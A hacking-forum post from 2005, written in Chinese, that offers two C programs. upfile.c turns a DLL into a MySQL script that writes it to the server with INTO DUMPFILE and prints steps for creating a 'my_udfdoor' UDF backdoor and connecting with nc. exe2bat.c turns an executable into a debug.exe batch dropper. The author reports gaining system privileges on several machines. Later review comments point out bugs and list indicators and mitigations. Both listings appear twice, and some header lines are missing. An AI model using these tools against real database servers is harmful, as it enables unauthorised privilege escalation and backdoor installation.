2005-11-18 18:57:48 by: h4x0r
MYSQL上传二进制文件的利用工具
看了黑防第7期的从MYSQL到系统权限的文章,里面作者写了个利用MYSQL上传二进制文件的利用工具,并给出了程序的源代码,俺按照他的方法,试验了几台机器都成功得到了系统权限。但是那个工具似乎写得不是很好,要先dir出文件的大小,然后再用重定向符>写入那个脚本,感觉好费劲,其实这些都可以用编程实现在程序内部的,于是俺就也写了个利用工具,比勇哥的感觉要好^_^,原程序如下,比较简单:
upfile.c
由于程序比较简单,所以没加注释。其实我们还可以融会贯通,把上面的代码稍微改下,就可以写一个
exe2bat的程序,原理就不详细说了,还是直接看我的代码:
exe2bat.c
upfile.c
#include <stdio.h>
#include <string.h>
/* Size of the banner buffer `ver` below. */
#define Max 600
/* Banner text printed by help(); a runtime string, kept exactly as written. */
char ver[Max]="\n\t\tWirtten by W.Z.T <Don't be lazy,Just go ahead>\n\n\t\t\tQQ:0x3731353739393132\n\n";
/* Prints the banner and usage text, then exits the process.
 * NOTE(review): this listing calls sleep() and exit() without including
 * <unistd.h>/<stdlib.h>; on a C99+ compiler these are implicit declarations. */
void help(void);
/* upfile(localfile, remotefile, scriptfile): writes the MySQL script to scriptfile. */
void upfile(char *,char *,char *);
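/*
 * Entry point: expects exactly three arguments, <localfile> <remotefile>
 * <script.txt>, and forwards them to upfile().
 * Any other argument count prints the usage text via help(), which exits.
 * The original checked only argc==1, so two or three arguments made
 * upfile() receive argv[2]/argv[3] as NULL or past the end of argv.
 */
int main(int argc,char **argv)
{
    if (argc != 4) {
        help();
    }
    upfile(argv[1], argv[2], argv[3]);
    return 0;
}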
/*
 * Print the banner held in the global `ver` one character at a time, with a
 * sleep() call between characters, then the usage text, and terminate the
 * process with exit status 0.  Never returns to the caller.
 * NOTE(review): the unit of sleep() is platform dependent (seconds on POSIX,
 * where this banner alone would take minutes); the listing was presumably
 * built with a Windows compiler — confirm before reusing.
 */
void help(void)
{
    const char *cur = ver;
    while (*cur != '\0') {
        sleep(15);
        putchar(*cur);
        cur++;
    }
    fputs("upfile.exe <localfile> <remotefile> <script.txt>\n\n", stdout);
    fputs("exp:\n\n", stdout);
    fputs("upfile.exe my_udf.dll c:\\\\my_udf.dll sgl.txt\n", stdout);
    exit(0);
}
/*
 * upfile - write a MySQL script that recreates a local binary on the server.
 *
 * line  : path of the local file to read (opened "rb").
 * line1 : path on the remote host the generated script writes to; inserted
 *         verbatim into the DUMPFILE clause and echoed in the usage hints.
 * line2 : path of the script file to create locally (opened "w+").
 *
 * The script stores the whole file as one hex literal in @a, copies it
 * through a temporary LONGBLOB table and writes it out with
 * SELECT ... INTO DUMPFILE.  Nothing is returned; a failed fopen() ends the
 * process with exit(0), i.e. a success status even on error.
 *
 * Defender notes: the strings this function emits are the indicators —
 * "create table sgl(data LONGBLOB)", "into DUMPFILE" and, in the printed
 * hints, "create FUNCTION ... SONAME" — all visible in the MySQL general or
 * audit log when a privileged account runs the script.  The technique needs
 * the FILE privilege and a mysqld that may write the target path; limiting
 * FILE, setting secure_file_priv and running mysqld as a low-privilege
 * account break it.
 */
void upfile(char *line,char *line1,char *line2)
{
FILE *fp_s,*fp_t;
/* Usage hints printed after the script is written.  use[3] ends with the
 * opening quote of the SONAME path; the print loop below emits line1 just
 * before use[4], which supplies the closing quote. */
char *use[7]={"\n#then,do as follows:\n\n",
"#mysql -h remoteip -uroot -p\n",
"#mysql>\\. script.txt\n",
"#create FUNCTION my_udfdoor RETURNS STRING SONAME \'",
"\';\n",
"#select my_udfdoor(\'\');\n\n",
"#nc -vv remoteip 3306/fuck\n"};
/* fgetc() result truncated to char: EOF is not detectable here, the loop
 * relies on lenth instead. */
char ch;
long lenth;
/* i counts bytes copied (int, compared against long lenth); j indexes hints. */
int i=0,j;
if((fp_s=fopen(line,"rb"))==NULL)
{
printf("Can't open the file %s.\n",line);
exit(0);
}
if((fp_t=fopen(line2,"w+"))==NULL)
{
printf("Can't open the file %s.\n",line2);
exit(0);
}
/* File size via seek/tell; ftell() errors (-1) are not checked and would
 * simply skip the copy loop. */
fseek(fp_s,0,SEEK_END);
lenth=ftell(fp_s);
fseek(fp_s,0,SEEK_SET);
/* NOTE(review): %x with a long argument is undefined where long is wider
 * than int (LP64); %lx would be correct. */
printf("\n#%s has %ld bytes,0x%x\n",line1,lenth,lenth);
/* Open the hex literal that will hold the whole file. */
fputs("set @a = concat(\'\',0x",fp_t);
while(i<lenth)
{
ch = fgetc(fp_s);
/* Manual zero padding for bytes below 0x10: "0" is printed literally and ch
 * is an unused extra argument.  "%02x" expresses the same thing directly. */
if(( unsigned char ) ch<= ( unsigned char )15)
fprintf(fp_t,"0",ch);
fprintf(fp_t,"%x",(unsigned char)ch);
i++;
}
/* Close the literal, then stage @a through a LONGBLOB column, dump it to
 * line1 and drop the table. */
fputs(");\n",fp_t);
fputs("use mysql;\n",fp_t);
fputs("create table sgl(data LONGBLOB);\n",fp_t);
fputs("insert into sgl values(\"\");\n",fp_t);
fputs("update sgl set data = @a;\n",fp_t);
fputs("select data from sgl into DUMPFILE \'",fp_t);
fputs(line1,fp_t);
fputs("\';\n",fp_t);
fputs("drop table sgl;\n",fp_t);
/* fclose() results are not checked; a write error on the script goes unnoticed. */
fclose(fp_s);
fclose(fp_t);
/* Print the hints one character at a time with a sleep() between them; the
 * sleep() unit is platform dependent (seconds on POSIX). */
for(i=0;i<7;i++)
{
if(i==4)
printf("%s",line1);
for(j=0;j<strlen(use[i]);j++)
{
sleep(20);
printf("%c",use[i][j]);
}
}
printf("done.good luck.\n\n");
}
#include <string.h>
/* Size of the banner buffer `ver` below. */
#define Max 600
/* Banner text printed by help(); a runtime string, kept exactly as written. */
char ver[Max]="\n\t\tWirtten by W.Z.T <Don't be lazy,Just go ahead>\n\n\t\t\tQQ:0x3731353739393132\n\n";
/* Prints the banner and usage text, then exits the process.
 * NOTE(review): this listing calls sleep() and exit() without including
 * <unistd.h>/<stdlib.h>; on a C99+ compiler these are implicit declarations. */
void help(void);
/* upfile(localfile, remotefile, scriptfile): writes the MySQL script to scriptfile. */
void upfile(char *,char *,char *);
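/*
 * Entry point: expects exactly three arguments, <localfile> <remotefile>
 * <script.txt>, and forwards them to upfile().
 * Any other argument count prints the usage text via help(), which exits.
 * The original checked only argc==1, so two or three arguments made
 * upfile() receive argv[2]/argv[3] as NULL or past the end of argv.
 */
int main(int argc,char **argv)
{
    if (argc != 4) {
        help();
    }
    upfile(argv[1], argv[2], argv[3]);
    return 0;
}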
/*
 * Print the banner held in the global `ver` one character at a time, with a
 * sleep() call between characters, then the usage text, and terminate the
 * process with exit status 0.  Never returns to the caller.
 * NOTE(review): the unit of sleep() is platform dependent (seconds on POSIX,
 * where this banner alone would take minutes); the listing was presumably
 * built with a Windows compiler — confirm before reusing.
 */
void help(void)
{
    const char *cur = ver;
    while (*cur != '\0') {
        sleep(15);
        putchar(*cur);
        cur++;
    }
    fputs("upfile.exe <localfile> <remotefile> <script.txt>\n\n", stdout);
    fputs("exp:\n\n", stdout);
    fputs("upfile.exe my_udf.dll c:\\\\my_udf.dll sgl.txt\n", stdout);
    exit(0);
}
/*
 * upfile - write a MySQL script that recreates a local binary on the server.
 *
 * line  : path of the local file to read (opened "rb").
 * line1 : path on the remote host the generated script writes to; inserted
 *         verbatim into the DUMPFILE clause and echoed in the usage hints.
 * line2 : path of the script file to create locally (opened "w+").
 *
 * The script stores the whole file as one hex literal in @a, copies it
 * through a temporary LONGBLOB table and writes it out with
 * SELECT ... INTO DUMPFILE.  Nothing is returned; a failed fopen() ends the
 * process with exit(0), i.e. a success status even on error.
 *
 * Defender notes: the strings this function emits are the indicators —
 * "create table sgl(data LONGBLOB)", "into DUMPFILE" and, in the printed
 * hints, "create FUNCTION ... SONAME" — all visible in the MySQL general or
 * audit log when a privileged account runs the script.  The technique needs
 * the FILE privilege and a mysqld that may write the target path; limiting
 * FILE, setting secure_file_priv and running mysqld as a low-privilege
 * account break it.
 */
void upfile(char *line,char *line1,char *line2)
{
FILE *fp_s,*fp_t;
/* Usage hints printed after the script is written.  use[3] ends with the
 * opening quote of the SONAME path; the print loop below emits line1 just
 * before use[4], which supplies the closing quote. */
char *use[7]={"\n#then,do as follows:\n\n",
"#mysql -h remoteip -uroot -p\n",
"#mysql>\\. script.txt\n",
"#create FUNCTION my_udfdoor RETURNS STRING SONAME \'",
"\';\n",
"#select my_udfdoor(\'\');\n\n",
"#nc -vv remoteip 3306/fuck\n"};
/* fgetc() result truncated to char: EOF is not detectable here, the loop
 * relies on lenth instead. */
char ch;
long lenth;
/* i counts bytes copied (int, compared against long lenth); j indexes hints. */
int i=0,j;
if((fp_s=fopen(line,"rb"))==NULL)
{
printf("Can't open the file %s.\n",line);
exit(0);
}
if((fp_t=fopen(line2,"w+"))==NULL)
{
printf("Can't open the file %s.\n",line2);
exit(0);
}
/* File size via seek/tell; ftell() errors (-1) are not checked and would
 * simply skip the copy loop. */
fseek(fp_s,0,SEEK_END);
lenth=ftell(fp_s);
fseek(fp_s,0,SEEK_SET);
/* NOTE(review): %x with a long argument is undefined where long is wider
 * than int (LP64); %lx would be correct. */
printf("\n#%s has %ld bytes,0x%x\n",line1,lenth,lenth);
/* Open the hex literal that will hold the whole file. */
fputs("set @a = concat(\'\',0x",fp_t);
while(i<lenth)
{
ch = fgetc(fp_s);
/* Manual zero padding for bytes below 0x10: "0" is printed literally and ch
 * is an unused extra argument.  "%02x" expresses the same thing directly. */
if(( unsigned char ) ch<= ( unsigned char )15)
fprintf(fp_t,"0",ch);
fprintf(fp_t,"%x",(unsigned char)ch);
i++;
}
/* Close the literal, then stage @a through a LONGBLOB column, dump it to
 * line1 and drop the table. */
fputs(");\n",fp_t);
fputs("use mysql;\n",fp_t);
fputs("create table sgl(data LONGBLOB);\n",fp_t);
fputs("insert into sgl values(\"\");\n",fp_t);
fputs("update sgl set data = @a;\n",fp_t);
fputs("select data from sgl into DUMPFILE \'",fp_t);
fputs(line1,fp_t);
fputs("\';\n",fp_t);
fputs("drop table sgl;\n",fp_t);
/* fclose() results are not checked; a write error on the script goes unnoticed. */
fclose(fp_s);
fclose(fp_t);
/* Print the hints one character at a time with a sleep() between them; the
 * sleep() unit is platform dependent (seconds on POSIX). */
for(i=0;i<7;i++)
{
if(i==4)
printf("%s",line1);
for(j=0;j<strlen(use[i]);j++)
{
sleep(20);
printf("%c",use[i][j]);
}
}
printf("done.good luck.\n\n");
}
由于程序比较简单,所以没加注释。其实我们还可以融会贯通,把上面的代码稍微改下,就可以写一个
exe2bat的程序,原理就不详细说了,还是直接看我的代码:
exe2bat.c
#include <stdio.h>
#include <string.h>
/* Exclusive upper bound on the input size: exe2bat() rejects lenth >= M.
 * 65279 is 0xFEFF — presumably what one 64 KiB debug.exe segment can hold
 * above the 0x100 load offset (TODO confirm). */
#define M 65279
/* Message printed by exe2bat() on success. */
char *msg="GOOD_LUCK";
/* Prints usage and exits.  exit() is used without <stdlib.h> in this listing. */
void help(void);
/* exe2bat(input, output): writes the batch file; always returns 0. */
char exe2bat(char *,char *);
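/*
 * Entry point: expects exactly two arguments, input.exe and output.bat, and
 * forwards them to exe2bat().  Any other count prints the usage via help(),
 * which exits.  The original tested argc==1 only, so a single argument made
 * exe2bat() receive argv[2] == NULL and hand it to fopen().
 */
int main(int argc,char **argv)
{
    if (argc != 3) {
        help();
    }
    exe2bat(argv[1], argv[2]);
    return 0;
}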
/*
 * Print the author banner and the usage line to stdout, then terminate the
 * process with exit status 0.  Never returns to the caller.
 */
void help()
{
    fputs("\nWritten by W.Z.T <==Don't be lazy,Just go ahead==>\n\n", stdout);
    fputs("exe2bat.exe input.exe output.bat\n", stdout);
    exit(0);
}
/*
 * exe2bat - write a batch file that recreates a binary with debug.exe.
 *
 * s_f : path of the binary to read (opened "rb"); the same string is reused
 *       as the name the result is renamed to and as the batch file's final
 *       command.
 * t_f : path of the batch file to create (opened "w+").
 *
 * Each generated line appends one debug.exe "e" (enter bytes at offset)
 * command to a script named "sgl"; the trailer sets CX to the length (rcx),
 * names the output (n tthacker), writes it (w) and quits (q), then the batch
 * runs "debug<sgl", deletes the script and renames the result.
 * Always returns 0; fopen() failures and oversize input exit via exit(0).
 *
 * Defender notes: a batch file that drives debug.exe with e/rcx/n/w/q lines
 * is the artifact to detect; blocking debug.exe through application control
 * (it is absent from 64-bit Windows) removes the technique.
 */
char exe2bat(char *s_f,char *t_f)
{
FILE *s_fp,*t_fp;
char *s_fe=s_f;
char *t_fe=t_f;
char c;
/* Unused. */
char ch;
long lenth;
/* i: 1-based byte counter, a new "e" line every 16 bytes.
 * k: debug.exe offset of the next byte, starting at 0x100. */
int i=1,k=256;
if((s_fp=fopen(s_fe,"rb"))==NULL)
{
printf("Can't open the file %s.\n",s_fe);
exit(0);
}
if((t_fp=fopen(t_fe,"w+"))==NULL)
{
printf("Can't create the file %s.\n",t_fe);
exit(0);
}
/* File size via seek/tell; ftell() errors (-1) are not checked. */
fseek(s_fp,0,SEEK_END);
lenth=ftell(s_fp);
fseek(s_fp,0,SEEK_SET);
/* NOTE(review): %x with a long argument is undefined on LP64; use %lx. */
printf("%ld,%x\n",lenth,lenth);
if(lenth>=M)
{
printf("The exe file's lenth must be <= M-1\n");
exit(0);
}
/* First "e" line header with the start offset (0100). */
fputs("@echo e ",t_fp);
fprintf(t_fp,"%04x ",k);
/* NOTE(review): feof() only becomes true after fgetc() has returned EOF, so
 * this loop runs once more than lenth and emits an extra 0xff byte (EOF
 * truncated to char).  Presumably the "rcx" value below limits what debug
 * writes, which is why it goes unnoticed — confirm. */
while(!feof(s_fp))
{
k++;
c = fgetc(s_fp);
/* Manual zero padding for bytes below 0x10: "0" is printed literally and c
 * is an unused extra argument; "%02x " expresses this directly. */
if(( unsigned char ) c<= ( unsigned char )15)
fprintf(t_fp,"0",c);
fprintf(t_fp,"%x ",(unsigned char)c);
/* Close the current line after 16 bytes and open the next header; if the
 * last byte lands here the new header is left dangling. */
if(i%16==0)
{
fputs(">>sgl\n",t_fp);
fputs("@echo e ",t_fp);
fprintf(t_fp,"%04x ",k);
}
i++;
}
/* NOTE(review): every other line redirects to "sgl" in the current
 * directory, but this one targets %tmp%\sgl, so the final partial line does
 * not reach the script debug reads; also the test uses lenth while the loop
 * emitted lenth+1 bytes.  Both look like bugs. */
if(lenth%16!=0)
fputs(">>%tmp%\\sgl\n",t_fp);
fputs("@echo rcx>>sgl\n",t_fp);
/* NOTE(review): %x with a long argument plus an extra t_fp argument; "%lx"
 * and no extra argument would be correct. */
fprintf(t_fp,"@echo %x>>sgl\n",lenth,t_fp);
/* debug writes the result as "tthacker"; it is renamed to s_fe below. */
fputs("@echo n tthacker>>sgl\n",t_fp);
fputs("@echo w>>sgl\n",t_fp);
fputs("@echo q>>sgl\n",t_fp);
fputs("@debug<sgl>nul\n",t_fp);
fputs("@del sgl\n",t_fp);
fputs("@ren tthacker ",t_fp);
/* NOTE(review): the ren command is redirected into sgl, which the line above
 * just deleted; the redirection looks accidental. */
fprintf(t_fp,"%s>>sgl\n",s_fe);
/* Final batch line: run the recreated file by name. */
fputs("@",t_fp);
fprintf(t_fp,"%s",s_fe);
/* fclose() results are not checked; a write error on the batch goes unnoticed. */
fclose(s_fp);
fclose(t_fp);
puts(msg);
/* Declared as returning char; the value is never used by main(). */
return 0;
}
#include <string.h>
/* Exclusive upper bound on the input size: exe2bat() rejects lenth >= M.
 * 65279 is 0xFEFF — presumably what one 64 KiB debug.exe segment can hold
 * above the 0x100 load offset (TODO confirm). */
#define M 65279
/* Message printed by exe2bat() on success. */
char *msg="GOOD_LUCK";
/* Prints usage and exits.  exit() is used without <stdlib.h> in this listing. */
void help(void);
/* exe2bat(input, output): writes the batch file; always returns 0. */
char exe2bat(char *,char *);
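/*
 * Entry point: expects exactly two arguments, input.exe and output.bat, and
 * forwards them to exe2bat().  Any other count prints the usage via help(),
 * which exits.  The original tested argc==1 only, so a single argument made
 * exe2bat() receive argv[2] == NULL and hand it to fopen().
 */
int main(int argc,char **argv)
{
    if (argc != 3) {
        help();
    }
    exe2bat(argv[1], argv[2]);
    return 0;
}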
/*
 * Print the author banner and the usage line to stdout, then terminate the
 * process with exit status 0.  Never returns to the caller.
 */
void help()
{
    fputs("\nWritten by W.Z.T <==Don't be lazy,Just go ahead==>\n\n", stdout);
    fputs("exe2bat.exe input.exe output.bat\n", stdout);
    exit(0);
}
/*
 * exe2bat - write a batch file that recreates a binary with debug.exe.
 *
 * s_f : path of the binary to read (opened "rb"); the same string is reused
 *       as the name the result is renamed to and as the batch file's final
 *       command.
 * t_f : path of the batch file to create (opened "w+").
 *
 * Each generated line appends one debug.exe "e" (enter bytes at offset)
 * command to a script named "sgl"; the trailer sets CX to the length (rcx),
 * names the output (n tthacker), writes it (w) and quits (q), then the batch
 * runs "debug<sgl", deletes the script and renames the result.
 * Always returns 0; fopen() failures and oversize input exit via exit(0).
 *
 * Defender notes: a batch file that drives debug.exe with e/rcx/n/w/q lines
 * is the artifact to detect; blocking debug.exe through application control
 * (it is absent from 64-bit Windows) removes the technique.
 */
char exe2bat(char *s_f,char *t_f)
{
FILE *s_fp,*t_fp;
char *s_fe=s_f;
char *t_fe=t_f;
char c;
/* Unused. */
char ch;
long lenth;
/* i: 1-based byte counter, a new "e" line every 16 bytes.
 * k: debug.exe offset of the next byte, starting at 0x100. */
int i=1,k=256;
if((s_fp=fopen(s_fe,"rb"))==NULL)
{
printf("Can't open the file %s.\n",s_fe);
exit(0);
}
if((t_fp=fopen(t_fe,"w+"))==NULL)
{
printf("Can't create the file %s.\n",t_fe);
exit(0);
}
/* File size via seek/tell; ftell() errors (-1) are not checked. */
fseek(s_fp,0,SEEK_END);
lenth=ftell(s_fp);
fseek(s_fp,0,SEEK_SET);
/* NOTE(review): %x with a long argument is undefined on LP64; use %lx. */
printf("%ld,%x\n",lenth,lenth);
if(lenth>=M)
{
printf("The exe file's lenth must be <= M-1\n");
exit(0);
}
/* First "e" line header with the start offset (0100). */
fputs("@echo e ",t_fp);
fprintf(t_fp,"%04x ",k);
/* NOTE(review): feof() only becomes true after fgetc() has returned EOF, so
 * this loop runs once more than lenth and emits an extra 0xff byte (EOF
 * truncated to char).  Presumably the "rcx" value below limits what debug
 * writes, which is why it goes unnoticed — confirm. */
while(!feof(s_fp))
{
k++;
c = fgetc(s_fp);
/* Manual zero padding for bytes below 0x10: "0" is printed literally and c
 * is an unused extra argument; "%02x " expresses this directly. */
if(( unsigned char ) c<= ( unsigned char )15)
fprintf(t_fp,"0",c);
fprintf(t_fp,"%x ",(unsigned char)c);
/* Close the current line after 16 bytes and open the next header; if the
 * last byte lands here the new header is left dangling. */
if(i%16==0)
{
fputs(">>sgl\n",t_fp);
fputs("@echo e ",t_fp);
fprintf(t_fp,"%04x ",k);
}
i++;
}
/* NOTE(review): every other line redirects to "sgl" in the current
 * directory, but this one targets %tmp%\sgl, so the final partial line does
 * not reach the script debug reads; also the test uses lenth while the loop
 * emitted lenth+1 bytes.  Both look like bugs. */
if(lenth%16!=0)
fputs(">>%tmp%\\sgl\n",t_fp);
fputs("@echo rcx>>sgl\n",t_fp);
/* NOTE(review): %x with a long argument plus an extra t_fp argument; "%lx"
 * and no extra argument would be correct. */
fprintf(t_fp,"@echo %x>>sgl\n",lenth,t_fp);
/* debug writes the result as "tthacker"; it is renamed to s_fe below. */
fputs("@echo n tthacker>>sgl\n",t_fp);
fputs("@echo w>>sgl\n",t_fp);
fputs("@echo q>>sgl\n",t_fp);
fputs("@debug<sgl>nul\n",t_fp);
fputs("@del sgl\n",t_fp);
fputs("@ren tthacker ",t_fp);
/* NOTE(review): the ren command is redirected into sgl, which the line above
 * just deleted; the redirection looks accidental. */
fprintf(t_fp,"%s>>sgl\n",s_fe);
/* Final batch line: run the recreated file by name. */
fputs("@",t_fp);
fprintf(t_fp,"%s",s_fe);
/* fclose() results are not checked; a write error on the batch goes unnoticed. */
fclose(s_fp);
fclose(t_fp);
puts(msg);
/* Declared as returning char; the value is never used by main(). */
return 0;
}








